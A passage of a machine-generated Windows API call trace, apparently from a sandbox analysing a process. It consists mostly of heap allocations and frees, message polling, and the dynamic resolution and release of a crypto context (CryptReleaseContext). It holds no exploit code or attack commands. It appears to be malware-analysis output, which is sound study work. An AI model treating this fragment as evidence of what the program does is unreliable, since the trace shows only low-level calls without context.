hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0123.393] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0123.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0123.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0123.394] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0123.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0123.395] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0123.395] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0123.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0123.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0123.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0123.397] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0123.397] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0123.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0123.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.399] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0123.399] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0123.399] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.399] FreeLibrary (hLibModule=0x756e0000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.399] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0123.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0123.399] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0123.400] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0123.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.400] CloseHandle (hObject=0x2a0) returned 1 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb450 | out: hHeap=0x1780000) returned 1 [0123.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0123.401] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0123.401] 